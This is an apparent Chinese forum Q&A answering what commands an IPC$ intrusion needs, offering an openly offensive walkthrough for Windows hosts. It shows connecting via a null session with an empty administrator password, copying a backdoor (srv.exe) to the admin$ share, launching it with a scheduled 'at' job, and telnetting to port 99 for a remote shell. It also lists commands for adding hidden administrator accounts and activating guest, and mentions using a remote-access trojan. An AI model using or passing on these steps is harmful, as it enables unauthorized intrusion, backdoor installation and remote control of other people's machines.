IPC连接入侵需要的命令都有哪些？

IPC$入侵命令 作者：Lo7e4L 提交日期：2004-10-13 05:35 一：入侵过程1)建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推) 如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$ 4)删除一个ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的c盘，其他盘类推 net use * /del 删除全部,会有提示要求按y确认 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用流光扫到的用户名是administrators，密码为"空"的IP地址，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。 　　 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。 　　 3. C:\>net time \\127.0.0.1 查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。 　　 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！） 　　 5. C:\>net time \\127.0.0.1 再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。 　　 6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了 　　 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在流光的Tools目录中）。 ……。见 http://hi.baidu.com/xyz17888/blog/item/52c10138cdf73d24b9998ff6.html

net use \\ip\ipc$ " " /user:" " 建立IPC空链接
　　net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
　　net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
　net use h: \\ip\c$ 登陆后映射对方C：到本地为H:
　　net use \\ip\ipc$ /del 删除IPC链接
　　net use h: /del 删除映射对方到本地的为H:的映射
　　net user 用户名　密码　/add 建立用户
　　net user guest /active:yes 激活guest用户
　　net user 查看有哪些用户
　net user 帐户名 查看帐户的属性
　　net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
　　net start 查看开启了哪些服务
　　net start 服务名　 开启服务;(如:net start telnet， net start schedule)
　　net stop 服务名 停止某服务
　　net time \\目标ip 查看对方时间
　　net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
　net view 查看本地局域网内开启了哪些共享
　　net view \\ip 查看对方局域网内开启了哪些共享
　　net config 显示系统网络设置
　　net logoff 断开连接的共享
　　net pause 服务名 暂停某服务

这些都是机器的口令！大家其实不用口令也能解决！！比如用鸽子！吧口令生成个文件！这样用起来还是比较方便的！

net view

net use \\192.168.1.x\ipc$ "" /user:Administrator

copy c:\1.exe \\192.168.1.x\C$

net time \\192.168.1.x

at \\192.168.1.1 12:12 c:\1.exe